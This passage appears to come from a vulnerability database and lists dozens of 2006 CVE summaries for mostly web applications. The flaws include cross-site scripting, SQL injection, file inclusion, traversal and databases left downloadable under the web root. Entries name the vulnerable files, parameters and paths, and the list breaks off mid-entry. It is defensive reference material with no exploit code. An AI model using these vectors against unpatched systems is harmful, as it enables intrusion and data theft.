4002. [CVE-2006-6851] Multiple cross-site scripting (XSS) vulnerabilities in contact_us.php in ac4p Mobilelib gold 2 allow remote attackers to inject arbitrary web script or HTML via the (1) email or (2) errr parameter. [CVE-2006-6845] Cross-site scripting (XSS) vulnerability in index.php in CMS Made Simple 1.0.2 allows remote attackers to inject arbitrary web script or HTML via the cntnt01searchinput parameter in a Search action. [CVE-2006-6844] Cross-site scripting (XSS) vulnerability in the optional user comment module in CMS Made Simple 1.0.2 allows remote attackers to inject arbitrary web script or HTML via the user comment form. [CVE-2006-6832] Cross-site scripting (XSS) vulnerability in Joomla! before 1.0.12 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly related to poll.php or the module title. [CVE-2006-6829] Efkan Forum 1.0 and earlier store sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for forum.mdb. NOTE: The provenance of this information is unknown [CVE-2006-6825] Calendar MX BASIC 1.0.2 and earlier store sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for calendar.mdb. NOTE: The provenance of this information is unknown [CVE-2006-6824] Multiple cross-site scripting (XSS) vulnerabilities in Jim Hu and Chad Little PHP iCalendar 2.23 rc1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) getdate parameter in (a) day.php, (b) month.php, (c) year.php, (d) week.php, (e) search.php, (f) rss/index.php, (g) print.php, and (h) preferences.php [CVE-2006-6822] myprofile.asp in Enthrallweb eClassifieds does not properly validate the MM_recordId parameter during profile updates, which allows remote authenticated users to modify certain profile fields of another account by specifying that account's username in a modified MM_recordId parameter. [CVE-2006-6821] myprofile.asp in Enthrallweb eNews does not properly validate the MM_recordId parameter during profile updates, which allows remote authenticated users to modify certain profile fields of another account by specifying that account's username in a modified MM_recordId parameter. [CVE-2006-6820] myprofile.asp in Enthrallweb eCoupons does not properly validate the MM_recordId parameter during profile updates, which allows remote authenticated users to modify certain profile fields of another account by specifying that account's username in a modified MM_recordId parameter. [CVE-2006-6819] AlstraSoft Web Host Directory stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a backup database via a direct request for admin/backup/db. [CVE-2006-6818] AlstraSoft Web Host Directory allows remote attackers to bypass authentication and change the admin password via a direct request to admin/config. [CVE-2006-6817] AlstraSoft Web Host Directory allows remote attackers to obtain sensitive information by requesting any invalid URI, which reveals the path in an error message, a different vulnerability than CVE-2006-2617. [CVE-2006-6815] Multiple cross-site scripting (XSS) vulnerabilities in DMXReady Secure Login Manager 1.0 allow remote authenticated administrators to inject arbitrary web script or HTML via unspecified parameters to (1) set_preferences.asp, (2) send_password_preferences.asp, and (3) SecureLoginManager/list.asp in the Local-Admin Panel. [CVE-2006-6808] Cross-site scripting (XSS) vulnerability in wp-admin/templates.php in WordPress 2.0.5 allows remote attackers to inject arbitrary web script or HTML via the file parameter. NOTE: some sources have reported this as a vulnerability in the get_file_description function in wp-admin/admin-functions.php. [CVE-2006-6807] SQL injection vulnerability in list.asp in Softwebs Nepal (aka Ananda Raj Pandey) Ananda Real Estate 3.4 and earlier allows remote attackers to execute arbitrary SQL commands via the agent parameter. [CVE-2006-6806] SQL injection vulnerability in newsdetail.asp in Enthrallweb eMates 1.0 allows remote attackers to execute arbitrary SQL commands via the ID parameter. [CVE-2006-6805] SQL injection vulnerability in newsdetail.asp in Enthrallweb eJobs allows remote attackers to execute arbitrary SQL commands via the ID parameter. [CVE-2006-6803] SQL injection vulnerability in Types.asp in Enthrallweb eCars 1.0 allows remote attackers to execute arbitrary SQL commands via the Type_id parameter. [CVE-2006-6802] SQL injection vulnerability in actualpic.asp in Enthrallweb ePages allows remote attackers to execute arbitrary SQL commands via the Biz_ID parameter. [CVE-2006-6782] Cross-site scripting (XSS) vulnerability in pnamazu 2006.02.28 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-6779] Cross-site scripting (XSS) vulnerability in Jelsoft vBulletin allows remote attackers to inject arbitrary web script or HTML via an SWF file that uses ActionScript to trigger execution of JavaScript. [CVE-2006-6778] Cross-site scripting (XSS) vulnerability in shownews.php in TimberWolf 1.2.2 allows remote attackers to inject arbitrary web script or HTML via the nid parameter. [CVE-2006-6777] Cross-site scripting (XSS) vulnerability in index.cfm in Future Internet allows remote attackers to inject arbitrary web script or HTML via the categoryId parameter in a Portal.ShowPage action. [CVE-2006-6769] Multiple cross-site scripting (XSS) vulnerabilities in PHP Live! 3.2.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) search_string parameter in (a) setup/transcripts.php, the (2) l parameter in (b) index.php, the (3) login field in (c) phplive/index.php, and the (4) deptid and (5) x parameters in (d) phplive/message_box.php. [CVE-2006-6768] Multiple cross-site scripting (XSS) vulnerabilities in default.asp in PWP Technologies The Classified Ad System allow remote attackers to inject arbitrary web script or HTML via the (1) cat or (2) main parameter. [CVE-2006-6746] Multiple cross-site scripting (XSS) vulnerabilities in Xt-News 0.1 allow remote attackers to inject arbitrary web script or HTML via the id_news parameter to (1) add_comment.php or (2) show_news.php. [CVE-2006-6735] modules/viewcategory.php in Minh Nguyen Duong Obie Website Mini Web Shop 2.1.c allows remote attackers to obtain sensitive information via a request with an arbitrary catname parameter but no itemsdb parameter, which reveals the path in an error message. NOTE: CVE analysis suggests that this error might be resultant from a more serious issue such as directory traversal. [CVE-2006-6734] Cross-site scripting (XSS) vulnerability in modules/viewcategory.php in Minh Nguyen Duong Obie Website Mini Web Shop 2.1.c allows remote attackers to inject arbitrary web script or HTML via the catname parameter. [CVE-2006-6733] Cross-site scripting (XSS) vulnerability in support/view.php in Support Cards 1 (osTicket) allows remote attackers to inject arbitrary web script or HTML via the e parameter. [CVE-2006-6729] Cross-site scripting (XSS) vulnerability in a-blog 1.51 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-6722] Bandwebsite (aka Bandsite portal system) 1.5 allows remote attackers to create administrative accounts via a direct request to admin.php with the Login parameter set to 1. [CVE-2006-6721] Multiple cross-site scripting (XSS) vulnerabilities in shout.php in Knusperleicht ShoutBox 2.6 allow remote attackers to inject arbitrary web script or HTML via the (1) sbNick or (2) sbKommentar parameter. [CVE-2006-6712] Cross-site scripting (XSS) vulnerability in SugarCRM Open Source 4.5.0f and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in crafted email messages. [CVE-2006-6708] Cross-site scripting (XSS) vulnerability in listings.asp in MGinternet Property Site Manager allows remote attackers to inject arbitrary web script or HTML via the s parameter. [CVE-2006-6706] SQL injection vulnerability in Soumu Workflow for Groupmax 01-00 through 01-01, Soumu Workflow 02-00 through 03-03, and Koukyoumuke Soumu Workflow 01-00 through 01-01 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors in certain web pages. [CVE-2006-6705] Multiple unspecified vulnerabilities in the template files in Soumu Workflow for Groupmax 01-00 through 01-01, Soumu Workflow 02-00 through 03-03, and Koukyoumuke Soumu Workflow 01-00 through 01-01 allow remote attackers to bypass authentication mechanisms on web pages via unknown vectors. [CVE-2006-6704] Cross-site scripting (XSS) vulnerability in the Webadmin in @Mail before 4.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving "unescaped data in the database." [CVE-2006-6703] Multiple cross-site scripting (XSS) vulnerabilities in Oracle Portal 9i and 10g allow remote attackers to inject arbitrary JavaScript via the tc parameter in webapp/jsp/container_tabs.jsp, and other unspecified vectors. [CVE-2006-6702] Cross-site scripting (XSS) vulnerability in Global.pm in @Mail before 4.61 allows remote attackers to inject arbitrary web script or HTML via crafted e-mail messages. NOTE: The provenance of this information is unknown [CVE-2006-6701] Cross-site request forgery (CSRF) vulnerability in util.pl in @Mail WebMail 4.51, and util.php in 5.x before 5.03, allows remote attackers to modify arbitrary settings and perform unauthorized actions as an arbitrary user, as demonstrated using a settings action in the SRC attribute of an IMG element in an HTML e-mail. [CVE-2006-6700] Cross-site scripting (XSS) vulnerability in @Mail WebMail allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: This information is based upon a vague initial disclosure. Details will be updated after the grace period has ended. [CVE-2006-6697] CRLF injection vulnerability in webapp/jsp/calendar.jsp in Oracle Portal 10g and earlier, including 9.0.2, allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via CRLF sequences in the enc parameter. [CVE-2006-6695] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Carsen Klock TextSend 1.5 allow remote attackers to inject arbitrary web script or HTML via the (1) error or (2) success parameter. NOTE: The provenance of this information is unknown [CVE-2006-6688] Web Automated Perl Portal (WebAPP) 0.9.9.4, and 0.9.9.3.4 Network Edition (NE) (aka WebAPP.NET) allows remote attackers to bypass filtering mechanisms via unknown vectors. NOTE: The provenance of this information is unknown [CVE-2006-6687] Cross-site scripting (XSS) vulnerability in Web Automated Perl Portal (WebAPP) 0.9.9.4, and 0.9.9.3.4 Network Edition (NE) (aka WebAPP.NET), allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: The provenance of this information is unknown [CVE-2006-6675] Cross-site scripting (XSS) vulnerability in Novell NetWare 6.5 Support Pack 5 and 6 and Novell Apache on NetWare 2.0.48 allows remote attackers to inject arbitrary web script or HTML via unspecifeid parameters in Welcome web-app. [CVE-2006-6669] Cross-site scripting (XSS) vulnerability in export_handler.php in WebCalendar 1.0.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the format parameter. [CVE-2006-6668] Cross-site scripting (XSS) vulnerability in VerliAdmin 0.3 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: The provenance of this information is unknown [CVE-2006-6649] Cross-site scripting (XSS) vulnerability in display.php in HyperVM 1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via an encoded frm_action parameter. NOTE: the vendor disputes this issue, but it is not certain whether the dispute is about the severity of the issue, or its existence. [CVE-2006-6647] Cross-site scripting (XSS) vulnerability in the MySite 4.7.x before 4.7.x-3.3 and 5.x before 5.x-1.3 module for Drupal allows remote attackers to inject arbitrary web script or HTML via the Title field when editing a page. NOTE: some details were obtained from third party information. [CVE-2006-6646] Multiple cross-site scripting (XSS) vulnerabilities in Drupal (1) Project Issue Tracking 4.7.x-1.0 and 4.7.x-2.0, and (2) Project 4.6.x-1.0, 4.7.x-1.0, and 4.7.x-2.0 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters, which do not use the check_plain function. [CVE-2006-6645] PHP remote file inclusion vulnerability in language/lang_english/lang_admin.php in the Web Links (mx_links) 2.05 and earlier module for mxBB allows remote attackers to execute arbitrary PHP code via a URL in the mx_root_path parameter. [CVE-2006-6640] Multiple cross-site scripting (XSS) vulnerabilities in Omniture SiteCatalyst allow remote attackers to inject arbitrary web script or HTML via the (1) ss parameter in (a) search.asp and the (2) company and (3) username fields on (b) the web login page. NOTE: some details were obtained from third party information. [CVE-2006-6637] The Servlet Engine and Web Container in IBM WebSphere Application Server (WAS) before 6.0.2.17, when ibm-web-ext.xmi sets fileServingEnabled to true and servlet caching is enabled, allows remote attackers to obtain JSP source code and other sensitive information via "specific requests." [CVE-2006-6636] Unspecified vulnerability in the Utility Classes for IBM WebSphere Application Server (WAS) before 5.1.1.13 and 6.x before 6.0.2.17 has unknown impact and attack vectors. [CVE-2006-6629] lib/WeBWorK/PG/Translator.pm in WeBWorK Program Generation (PG) Language before 2.3.1 uses an insufficiently restrictive regular expression to determine valid macro filenames, which allows attackers to load arbitrary macro files whose names contain the strings (1) dangerousMacros.pl, (2) PG.pl, or (3) IO.pl. [CVE-2006-6626] Cross-site scripting (XSS) vulnerability in an unspecified component of Moodle 1.5 allows remote attackers to inject arbitrary web script or HTML via a javascript URI in the SRC attribute of an IMG element. NOTE: The provenance of this information is unknown [CVE-2006-6625] Cross-site scripting (XSS) vulnerability in mod/forum/discuss.php in Moodle 1.6.1 allows remote attackers to inject arbitrary web script or HTML via the navtail parameter. NOTE: The provenance of this information is unknown [CVE-2006-6616] index.php in w00t Gallery 1.4.0 allows remote authenticated users with privileges for one installation to gain access to other installations on the same web server, aka "multi-gallery admin session spanning." NOTE: some of these details are obtained from third party information. [CVE-2006-6611] PHP remote file inclusion vulnerability in interface.php in Barman 0.0.1r3 allows remote attackers to execute arbitrary PHP code via a URL in the basepath parameter. [CVE-2006-6607] The Java Key Store (JKS) for WebSphere Application Server (WAS) for IBM Tivoli Identity Manager (ITIM) 4.6 places the JKS password in a -Djavax.net.ssl.trustStorePassword command line argument, which allows local users to obtain the password by listing the process or using other methods. [CVE-2006-6600] Cross-site scripting (XSS) vulnerability in dir.php in TorrentFlux 2.2, when allows remote attackers to inject arbitrary web script or HTML via double URL-encoded strings in the dir parameter, a related issue to CVE-2006-5609. [CVE-2006-6589] Cross-site scripting (XSS) vulnerability in ecommerce/control/keywordsearch in the Apache Open For Business Project (OFBiz) and Opentaps 0.9.3 allows remote attackers to inject arbitrary web script or HTML via the SEARCH_STRING parameter, a different issue than CVE-2006-6587. NOTE: some of these details are obtained from third party information. [CVE-2006-6587] Cross-site scripting (XSS) vulnerability in the forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) allows remote attackers to inject arbitrary web script or HTML by posting a message. [CVE-2006-6582] Multiple cross-site scripting (XSS) vulnerabilities in ScriptMate User Manager 2.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) members_username (user) and (2) members_password (password) fields in a login action in members/default.asp, and (3) the Search box. NOTE: some of these details are obtained from third party information. [CVE-2006-6578] Microsoft Internet Information Services (IIS) 5.1 permits the IUSR_Machine account to execute non-EXE files such as .COM files, which allows attackers to execute arbitrary commands via arguments to any .COM file that executes those arguments, as demonstrated using win.com when it is in a web directory with certain permissions. [CVE-2006-6571] Multiple cross-site scripting (XSS) vulnerabilities in form.php in GenesisTrader 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) cuve, (2) chem, (3) do, and possibly other parameters. [CVE-2006-6548] Multiple cross-site scripting (XSS) vulnerabilities in cPanel WebHost Manager (WHM) 3.1.0 allow remote authenticated users to inject arbitrary web script or HTML via the domain parameter to (1) scripts2/changeemail, (2) scripts2/limitbw, or (3) scripts/rearrangeacct. NOTE: the feature parameter to scripts2/dofeaturemanager is already covered by CVE-2006-6198. [CVE-2006-6544] Cross-site scripting (XSS) vulnerability in CM68 News allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: The provenance of this information is unknown [CVE-2006-6537] IBM WebSphere Host On-Demand 6.0, 7.0, 8.0, 9.0, and possibly 10, allows remote attackers to bypass authentication via a modified pnl parameter, related to hod/HODAdmin.html and hod/frameset.html. [CVE-2006-6536] Cross-site scripting (XSS) vulnerability in hata.asp in Cilem Haber Free Edition allows remote attackers to inject arbitrary web script or HTML via the hata parameter. NOTE: The provenance of this information is unknown [CVE-2006-6534] Multiple cross-site scripting (XSS) vulnerabilities in osCommerce 3.0a3 allow remote attackers to inject arbitrary web script or HTML via the (1) set parameter to admin/modules.php, the (2) selected_box parameter to definitiva/admin/customers.php, the (3) lID parameter to admin/languages_definitions.php, or the (4) pID parameter to admin/products.php. [CVE-2006-6532] Multiple cross-site scripting (XSS) vulnerabilities in Vt-Forum Lite 1.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) StrMsg or (2) Topic_ID parameter to (a) vf_info.asp, (b) vf_newtopic.asp, (c) vf_settings.asp, and (d) vf_replytopic.asp, different vectors than CVE-2006-6447. NOTE: The provenance of this information is unknown [CVE-2006-6531] Cross-site scripting (XSS) vulnerability in the Help Tip module before 4.7.x-1.0 for Drupal allows remote attackers to inject arbitrary web script or HTML, and possibly obtain administrative access, via node titles. [CVE-2006-6523] Cross-site scripting (XSS) vulnerability in mail/manage.html in BoxTrapper in cPanel 11 allows remote attackers to inject arbitrary web script or HTML via the account parameter. [CVE-2006-6522] Multiple cross-site scripting (XSS) vulnerabilities in WikiTimeScale TwoZero before 2.31 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors in the (1) forum module and (2) event descriptions. NOTE: some of these details are obtained from third party information. [CVE-2006-6520] Multiple cross-site scripting (XSS) vulnerabilities in Messageriescripthp 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) pseudo parameter to (a) existepseudo.php, the (2) email parameter to (b) existeemail.php, or the (3) pageName or (4) cssform parameter to (c) Contact/contact.php. [CVE-2006-6518] Multiple cross-site scripting (XSS) vulnerabilities in ProNews 1.5 allow remote attackers to inject arbitrary web script or HTML via the (1) pseudo, (2) email, (3) date, (4) sujet, (5) message, (6) site, and (7) lien parameters to (a) admin/change.php, and the (8) aa parameter to (b) lire-avis.php. [CVE-2006-6517] Multiple cross-site scripting (XSS) vulnerabilities in KDPics 1.16 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) categories parameter to (a) index.php3 or (b) galeries.inc.php3. [CVE-2006-6509] Cross-site scripting (XSS) vulnerability in the skinning feature in SiteKiosk before 6.5.150 allows local users to bypass security protections and inject arbitrary web script or HTML via an ABOUT: URI, which is displayed in the title bar of the browser. [CVE-2006-6487] Cross-site scripting (XSS) vulnerability in index.php in DT Guestbook (dt_guestbook) 1.0f, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the error[] parameter. [CVE-2006-6485] Multiple cross-site scripting (XSS) vulnerabilities in ShopSite 8.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the prevlocation parameter in shopper/sc/registration.cgi and other unspecified vectors. [CVE-2006-6483] Adobe ColdFusion MX 7.x before 7.0.2 does not properly filter HTML tags when protecting against cross-site scripting (XSS) attacks, which allows remote attackers to inject arbitrary web script or HTML via a NULL byte (%00) in certain HTML tags, as demonstrated using "%00script" in a tag. [CVE-2006-6479] Multiple cross-site scripting (XSS) vulnerabilities in AnnonceScriptHP 2.0 allow remote attackers to inject arbitrary web script or HTML via the email parameter in (1) erreurinscription.php, (2) Templates/admin.dwt.php, (3) Templates/commun.dwt.php, (4) membre.dwt.php, and (5) admin/admin_config/Aide.php. [CVE-2006-6476] FRAgent.exe in Mandiant First Response (MFR) before 1.1.1, when run in daemon mode and when the agent is bound to 0.0.0.0 (all interfaces), opens sockets in non-exclusive mode, which allows local users to hijack the socket, and capture data or cause a denial of service (loss of daemon operation). [CVE-2006-6473] Multiple unspecified vulnerabilities in Xerox WorkCentre and WorkCentre Pro before 12.050.03.000, 13.x before 13.050.03.000, and 14.x before 14.050.03.000 have unknown impact and attack vectors, related to (1) an Immediate Image Overwrite (IIO) error message at the Local User Interface (LUI) if overwrite fails, (2) an IIO failure when a Held Job is deleted, and (3) an On Demand Image Overwrite failure when the overwrite is greater than 2 Gb. [CVE-2006-6466] Multiple cross-site scripting (XSS) vulnerabilities in WBmap.php in WikyBlog 1.3.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) key, (2) d, (3) l, or (4) v parameter. NOTE: the provenance of this information is unknown [CVE-2006-6463] Unrestricted file upload vulnerability in admin/add.php in Midicart allows remote authenticated users to upload arbitrary .php files, and possibly other files, to the images/ directory under the web root. [CVE-2006-6459] Cross-site scripting (XSS) vulnerability in toplist.php in PhpBB Toplist 1.3.7 allows remote attackers to inject arbitrary HTML or web script via the (1) Name and (2) Information fields when adding a new site (toplistnew action). [CVE-2006-6452] Multiple cross-site scripting (XSS) vulnerabilities in the MyArticles module before 0.6 beta 1, for RunCMS, allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) topics.php, (2) submit.php, and (3) class/calendar.class.php. [CVE-2006-6451] Multiple cross-site scripting (XSS) vulnerabilities in SWsoft Plesk 8.0.1 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) get_password.php or (2) login_up.php3. [CVE-2006-6449] Vt-Forum Lite 1.3 and earlier store sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/forum.mdb. NOTE: The provenance of this information is unknown [CVE-2006-6447] Multiple cross-site scripting (XSS) vulnerabilities in Vt-Forum Lite 1.3 and 1.5 allow remote attackers to inject arbitrary web script or HTML via (1) the StrMes parameter in vf_info.asp and possibly (2) a URL in the SRC attribute of an IFRAME element that is submitted to vf_newtopic.asp. [CVE-2006-6436] Cross-site scripting (XSS) vulnerability in the Network controller in Xerox WorkCentre and WorkCentre Pro before 12.050.03.000, 13.x before 13.050.03.000, and 14.x before 14.050.03.000 allows remote attackers to inject arbitrary web script or HTML via HTTP TRACE messages. [CVE-2006-6430] Web services in Xerox WorkCentre and WorkCentre Pro before 12.060.17.000, 13.x before 13.060.17.000, and 14.x before 14.060.17.000 do not require HTTPS, which allows remote attackers to obtain sensitive information by sniffing the unencrypted HTTP traffic. [CVE-2006-6421] Cross-site scripting (XSS) vulnerability in the private message box implementation (privmsg.php) in phpBB 2.0.x allows remote authenticated users to inject arbitrary web script or HTML via the "Message body" field in a message to a non-existent user. [CVE-2006-6420] Multiple cross-site scripting (XSS) vulnerabilities in jce.php in the JCE Admin Component in Ryan Demmer Joomla Content Editor (JCE) 1.1.0 beta 2 and earlier for Joomla! (com_jce) allow remote attackers to inject arbitrary web script or HTML via the (1) img, (2) title, (3) w, or (4) h parameter, different vectors than CVE-2006-6166. NOTE: The provenance of this information is unknown [CVE-2006-6413] Cross-site scripting (XSS) vulnerability in Amateras sns 3.11 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-6401] Multiple cross-site scripting (XSS) vulnerabilities in mystats.php in MyStats 1.0.8 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) connexion, (2) by, and (3) details parameter. [CVE-2006-6393] Cross-site scripting (XSS) vulnerability in Jonas Gauffin Publicera 1.0-rc2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the InputFilter::getString function. [CVE-2006-6392] Directory traversal vulnerability in index.php in plx Web Studio (aka plxWebDev) plx Pay 3.2 and earlier allows remote attackers to include and execute arbitrary local files, or obtain user credentials and other sensitive information, via a .. (dot dot) in the read parameter. NOTE: The provenance of this information is unknown [CVE-2006-6389] Multiple cross-site scripting (XSS) vulnerabilities in ac4p Mobile allow remote attackers to inject arbitrary web script or HTML via the (1) Taaa parameter to (a) up.php, or the (2) pollhtml and (3) Bloks parameters to (b) polls.php, different vectors than CVE-2006-5770. [CVE-2006-6388] Cross-site scripting (XSS) vulnerability in naprednaPretraga.php in LINK Content Management Server (CMS) allows remote attackers to inject arbitrary web script or HTML via the txtPretraga parameter. NOTE: The provenance of this information is unknown [CVE-2006-6386] Cross-site scripting (XSS) vulnerability in the CVS management/tracker 4.7.x-1.0, 4.7.x-2.0, and 4.7.0 (before the 20060807 contribution release system) for Drupal allows remote attackers to inject arbitrary web script or HTML via the motivation field in the CVS application page, which is not passed through check_markup on display. [CVE-2006-6380] Cross-site scripting (XSS) vulnerability in index.asp in Ultimate HelpDesk allows remote attackers to inject arbitrary web script or HTML via the keyword parameter. [CVE-2006-6378] BTSaveMySql 1.2 stores sensitive data under the web root with insufficient access control, which allows remote attackers to obtain configuration and save files via direct requests. [CVE-2006-6377] Uploadscript 1.2 and earlier stores sensitive data under the web root with insufficient access control, which allows remote attackers to obtain the admin password hash via a direct request for /password.txt. [CVE-2006-6375] Cross-site scripting (XSS) vulnerability in display.php in Simple Machines Forum (SMF) 1.1 Final and earlier allows remote attackers to inject arbitrary web script or HTML via the contents of a file that is uploaded with the image parameter set, which can be interpreted as script by Internet Explorer's automatic type detection. [CVE-2006-6372] Multiple cross-site scripting (XSS) vulnerabilities in pbguestbook.php in JAB Guest Book 20061205 allow remote attackers to inject arbitrary web script or HTML via the (1) topic or (2) message parameter. NOTE: The provenance of this information is unknown [CVE-2006-6371] Cross-site scripting (XSS) vulnerability in pbguestbook.php in JAB Guest Book allows remote attackers to inject arbitrary web script or HTML via the author parameter. [CVE-2006-6366] Cross-site scripting (XSS) vulnerability in includes/elements/spellcheck/spellwin.php in Cerberus Helpdesk 0.97.3, 2.0 through 2.7, 3.2.1, and 3.3 allows remote attackers to inject arbitrary web script or HTML via the js parameter. NOTE: The provenance of this information is unknown [CVE-2006-6364] Cross-site scripting (XSS) vulnerability in error.php in Inside Systems Mail (ISMail) 2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the error parameter. [CVE-2006-6363] Cross-site scripting (XSS) vulnerability in admin.pl in BlueSocket Secure Controller (BSC) before 5.2, or without 5.1.1-BluePatch, allows remote attackers to inject arbitrary web script or HTML via the ad_name parameter. [CVE-2006-6359] Cross-site scripting (XSS) vulnerability in Stefan Frech online-bookmarks 0.6.12 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-6357] Cross-site scripting (XSS) vulnerability in templates/cat_temp.php in PHPNews 1.3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: The provenance of this information is unknown [CVE-2006-6356] Multiple cross-site scripting (XSS) vulnerabilities in templates/link_temp.php in PHPNews 1.3.0 allow remote attackers to inject arbitrary web script or HTML via the (1) url, (2) id, (3) subject, (4) username, or (5) time parmeter. [CVE-2006-6351] KhaledMuratList stores sensitive data under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for (1) CL2F9R1A2C1N.mdb or (2) Data2F9R1A2C1N.mdb. [CVE-2006-6350] listpics 5 stores sensitive data under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for listpics.mdb. [CVE-2006-6348] Cross-site scripting (XSS) vulnerability in board.php in mowdBB RC-6 allows remote attackers to inject arbitrary web script or HTML via the forum_name[] parameter. [CVE-2006-6334] Heap-based buffer overflow in the SendChannelData function in wfica.ocx in Citrix Presentation Server Client before 9.230 for Windows allows remote malicious web sites to execute arbitrary code via a DataSize parameter that is less than the length of the Data buffer. [CVE-2006-6308] DISPUTED Symantec LiveState 7.1 Agent for Windows allows local users to gain privileges by stopping the shstart.exe process and open "Web Self-Service" from the system tray icon, which will open a browser window running with elevated privileges. NOTE: several third-party researchers have noted that administrator privileges may be necessary to terminate shstart.exe. If this is the case, then no privilege escalation occurs, and this is not a vulnerability. [CVE-2006-6300] Cross-site scripting (XSS) vulnerability in CuteNews 1.3.6 allows remote attackers to inject arbitrary web script or HTML via the result parameter. [CVE-2006-6283] Multiple cross-site scripting (XSS) vulnerabilities in Vikingboard 0.1.2 allow remote attackers to inject arbitrary web script or HTML via the subject field of (1) a private message (PM) or (2) a bulletin board post. [CVE-2006-6278] Cross-site scripting (XSS) vulnerability in index.php in @lex Guestbook 4.0.1 allows remote attackers to inject arbitrary web script or HTML via the skin parameter. [CVE-2006-6276] HTTP request smuggling vulnerability in Sun Java System Proxy Server before 20061130, when used with Sun Java System Application Server or Sun Java System Web Server, allows remote attackers to bypass HTTP request filtering, hijack web sessions, perform cross-site scripting (XSS), and poison web caches via unspecified attack vectors. [CVE-2006-6272] Cross-site scripting (XSS) vulnerability in sp_index.php in Simple PHP Gallery 1.1 allows remote attackers to inject arbitrary web script or HTML via the dir parameter. [CVE-2006-6271] Multiple cross-site scripting (XSS) vulnerabilities in PHPOLL 0.96 allow remote attackers to inject arbitrary web script or HTML via the language parameter to (1) index.php, (2) info.php [CVE-2006-6259] Multiple directory traversal vulnerabilities in (a) class/functions.php and (b) class/m_bro.php in AlternC 0.9.5 and earlier allow remote attackers to (1) create arbitrary files and directories via a .. (dot dot) in the "create name" field and (2) read arbitrary files via a .. (dot dot) in the "web root" field when configuring a subdomain. [CVE-2006-6256] Cross-site scripting (XSS) vulnerability in the file manager in admin/bro_main.php in AlternC 0.9.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a folder name. [CVE-2006-6254] administration/telecharger.php in Cahier de texte 2.0 allows remote attackers to obtain unparsed content (source code) of files via the chemin parameter, as demonstrated using directory traversal sequences to obtain the MySQL username and password from conn_cahier_de_texte.php. NOTE: it is not clear whether the scope of this issue extends above the web document root, and whether directory traversal is the primary vulnerability. [CVE-2006-6253] Cahier de texte 2.0 stores sensitive information under the web root, possibly with insufficient access control, which might allow remote attackers to obtain all users' passwords via a direct request for administration/dump.sql. [CVE-2006-6249] Cross-site scripting (XSS) vulnerability in Chama Cargo 4.36 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-6239] webadmin in MailEnable NetWebAdmin Professional 2.32 and Enterprise 2.32 allows remote attackers to authenticate using an empty password. [CVE-2006-6228] Cross-site scripting (XSS) vulnerability in Codewalkers ltwCalendar (aka PHP Event Calendar) before 4.2.1 allows remote attackers to inject arbitrary HTML or web script via unknown vectors. [CVE-2006-6223] Cross-site scripting (XSS) vulnerability in Google Search Appliance and Google Mini allows remote attackers to inject arbitrary web script or HTML via a UTF-7 encoded q parameter. [CVE-2006-6220] Multiple SQL injection vulnerabilities in Recipes Website (Recipes Complete Website) 1.1.14 allow remote attackers to execute arbitrary SQL commands via the (1) recipeid parameter to recipe.php or the (2) categoryid parameter to list.php. [CVE-2006-6219] Multiple cross-site scripting (XSS) vulnerabilities in index.php in dev4u CMS allow remote attackers to inject arbitrary web script or HTML via the (1) user_name, (2) passwort, and (3) go_target parameters. [CVE-2006-6215] Multiple SQL injection vulnerabilities in Wallpaper Website (Wallpaper Complete Website) 1.0.09 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) login or (2) password parameter to (a) process.php, or the (3) wallpaperid parameter to (b) dlwallpaper.php. [CVE-2006-6214] SQL injection vulnerability in wallpaper.php in Wallpaper Website (Wallpaper Complete Website) 1.0.09 allows remote attackers to execute arbitrary SQL commands via the wallpaperid parameter. [CVE-2006-6211] Multiple cross-site scripting (XSS) vulnerabilities in BirdBlog 1.4.0 allow remote attackers to inject arbitrary web script or HTML via the (1) msg parameter to (a) admin/admincore.php, the (2) month parameter to (b) admin/comments.php or (c) admin/entries.php, or the (3) page parameter to (d) admin/logs.php, different vectors than CVE-2006-5064. [CVE-2006-6208] Multiple SQL injection vulnerabilities in Enthrallweb eClassifieds allow remote attackers to execute arbitrary SQL commands via the (1) AD_ID, (2) cat_id, 